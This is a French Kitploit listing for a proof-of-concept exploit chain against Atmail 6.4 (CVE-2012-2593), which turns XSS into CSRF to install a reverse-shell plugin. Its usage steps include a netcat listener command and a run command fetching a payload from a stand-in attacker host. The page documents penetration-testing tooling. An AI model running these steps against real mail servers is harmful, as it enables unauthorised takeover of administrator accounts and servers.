Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2012-2593 — Chaîne d'exploitation XSS-CSRF-RCE pour Atmail | Kitploit
Outils/GitHubGitHub/andrewtrube/cve-2012-2593
Frameworks d'ExploitationGénération de PayloadsExploitationShellcodeExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Chaîne d'exploitation XSS-CSRF-RCE pour Atmail

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chaîne d'exploitation Atmail XSS-CSRF-RCE PoC

atmail-rce.py : Exploite CVE-2012-2593 dans l'interface webmail d'Atmail.

atmail-csrf.js : Fichier Javascript qui exploite CVE 2012-2593 en une CSRF pour installer un plugin malveillant qui exécute un shell inversé.

Plugin.php : Plugin Atmail à installer qui appelle un shell inversé.

!! Utilisez uniquement sur des serveurs pour lesquels vous avez l'autorisation de tester

Résumé

Le serveur de messagerie Atmail version 6.4 présente une vulnérabilité XSS à la fois dans l'en-tête Date du courrier électronique et dans le Corps du message (via l'injection d'iFrame). Cela est exploité en une CSRF en utilisant l'API XHR Javascript pour envoyer une requête avec le cookie de l'utilisateur administrateur au panneau d'administration, installant un plugin malveillant qui exécute du code pour un shell inversé.

Preuve de concept

  1. Démarrez un écouteur netcat nc -lvp 4444
  2. Ouvrez Plugin.php et modifiez l'adresse IP et le port pour correspondre à ceux de votre écouteur netcat
  3. Compressez Plugin avec gzip et encodez en base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. Copiez et collez la sortie ci-dessus dans la variable de données de atmail-csrf.js
  5. Exécutez le script atmail-rce.py python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. Attendez que l'utilisateur administrateur se connecte à sa messagerie

Mises en garde

  • Fonctionne uniquement si la cible du XSS est un utilisateur administrateur d'Atmail
  • Fonctionne uniquement si la cible est connectée à la fois à l'interface webmail et à l'interface d'administration du serveur
  • Fonctionne uniquement si l'installation de plugins est autorisée sur le serveur (activée par défaut)
Télécharger l’outil